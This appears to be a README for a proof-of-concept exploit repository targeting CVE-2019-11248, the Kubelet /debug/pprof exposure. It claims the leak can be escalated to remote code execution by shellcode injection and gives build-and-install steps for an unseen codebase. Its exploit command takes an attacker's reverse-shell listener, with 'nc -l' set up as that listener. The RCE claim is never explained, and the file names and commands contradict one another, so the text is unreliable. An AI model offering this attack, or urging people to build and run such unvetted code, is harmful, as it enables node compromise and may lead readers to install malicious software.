POC CVE-2019-11248 -

Overview

This repository contains a proof-of-concept (PoC) exploit for CVE-2019-11248, a medium-severity vulnerability in Kubernetes’ Kubelet, which can lead to Remote Code Execution (RCE) under certain conditions. The vulnerability stems from the exposure of the /debug/pprof endpoint on the Kubelet’s healthz port. This PoC showcases a novel method to escalate the initial information disclosure into a full-blown RCE attack, utilizing unprotected memory and internal Kubelet data.

What’s New?

While previous discussions around this CVE primarily focused on information leakage and denial-of-service (DoS) attacks, this PoC demonstrates a previously unused attack vector that allows for code injection and execution on the underlying system by leveraging the exposed Kubelet memory addresses and profiling data.

CVE Details

CVE ID: CVE-2019-11248
Vulnerability Type: Information Disclosure / RCE
Affected Versions:
- Kubernetes Kubelet versions prior to 1.15.0, 1.14.4, 1.13.8, and 1.12.10.
Severity: Medium (Information Disclosure), Escalated to High (RCE).
Attack Vector: Network (Unauthenticated access to Kubelet’s healthz port).

Vulnerability Summary

The /debug/pprof endpoint is exposed over the Kubelet’s unauthenticated healthz port (typically 10248), allowing remote attackers to access profiling data such as memory usage, goroutine stacks, and heap dumps. Normally, this endpoint is intended for debugging purposes, but its exposure can lead to information disclosure and the leakage of sensitive memory addresses.

In this PoC, we demonstrate how the attacker can use this information to inject malicious code into the Kubelet process. By taking advantage of memory structures and leveraging the Kubelet’s internal profiling data, this attack results in remote code execution on the Kubernetes node.

Exploitation Details

This PoC illustrates a sophisticated exploitation strategy that escalates the information disclosure vulnerability into a full RCE attack. By using memory leaks from the /debug/pprof endpoint, the attacker can locate vulnerable memory regions and inject shellcode into the Kubelet process, enabling code execution.

Novel Approach

Memory Leak Exploitation: The PoC automates the retrieval of heap dumps and memory profiles from the /debug/pprof endpoint to locate critical memory regions where code can be injected.
Shellcode Injection: After identifying a suitable memory region, the PoC injects shellcode into the Kubelet’s process, exploiting the leaked memory addresses.
RCE Payload Execution: The injected shellcode is designed to give the attacker control over the Kubernetes node, enabling arbitrary command execution.

Setup & Usage

Prerequisites

A Kubernetes environment with a vulnerable version of Kubelet (prior to 1.15.0, 1.14.4, 1.13.8, or 1.12.10).
C compiler (e.g., g++).
Network access to the Kubelet’s healthz port (commonly 10248).
Basic knowledge of Kubernetes internals and memory manipulation techniques.

Compilation

Clone the repository:

git clone https://codeberg.org/bluef1sher/poc-cve-2019-11248.git
cd cve-2019-11248

Compile the PoC exploit:
```
./configure
make
make install
```
The exploit code is installed as /usr/local/bin/cve-2019-11248

Running the PoC

Ensure that the Kubelet’s healthz port is accessible from your machine.
Execute the compiled exploit by passing the Kubelet’s healthz port URL:
```
cve-2019-11248-exploit http://<kubelet-ip>:10248 local_ip local_port
```
local_ip and local_port are attacker’s machine reverse shell listener.

For example, for reverse shell, run from your server nc -l 33000. Then local_port is 33000 and local_ip is your_server_ip. Make sure 33000 is accessible and the ip is routable. For home routers, port forwarding is required.
The PoC will start by querying the exposed /debug/pprof endpoint to retrieve profiling data.
Once the memory profiling data is collected, the PoC identifies vulnerable memory regions and injects the RCE payload.
Upon successful exploitation, the PoC will execute the injected code, giving the attacker control over the Kubernetes node.

Expected Output

When the exploit successfully completes:

The PoC will output detailed profiling information, including the memory addresses of critical sections.
The shellcode will be injected into the Kubelet process.
A reverse shell or arbitrary code execution will be initiated on the target node, giving the attacker remote control of the Kubernetes environment.

Exploit Details

Memory Profiling Exploitation

This PoC takes advantage of the /debug/pprof endpoint to leak Kubelet memory addresses, which can be used to identify writable memory regions. The attacker can then use this knowledge to inject shellcode directly into the Kubelet process.

Shellcode Injection

By combining the memory leak with specific characteristics of the Go runtime used by Kubelet, the PoC injects malicious shellcode into the process’s memory space. This shellcode is executed to achieve remote code execution on the Kubernetes node, potentially allowing for container escape or full cluster compromise.

Code Execution

Once the memory is successfully manipulated, the PoC executes the injected payload. The payload can be customized, but by default, it opens a reverse shell connection, allowing the attacker to execute arbitrary commands on the node.

Mitigation & Patching

To mitigate this vulnerability:

Upgrade to a patched version of Kubernetes Kubelet (1.15.0, 1.14.4, 1.13.8, or 1.12.10).
Secure the healthz port by preventing unauthenticated access, either by using proper network segmentation or by disabling the debugging endpoints.
Use firewall rules and network policies to limit access to critical components like the Kubelet.

Disclaimer

This PoC is provided for educational purposes only. It is intended to demonstrate how this vulnerability could be exploited in certain conditions. Unauthorized use of this exploit in production environments may result in legal consequences. The authors do not take responsibility for any misuse of the information provided.

License

This project is licensed under the MIT License - see the LICENSE file for details.

cve-poc download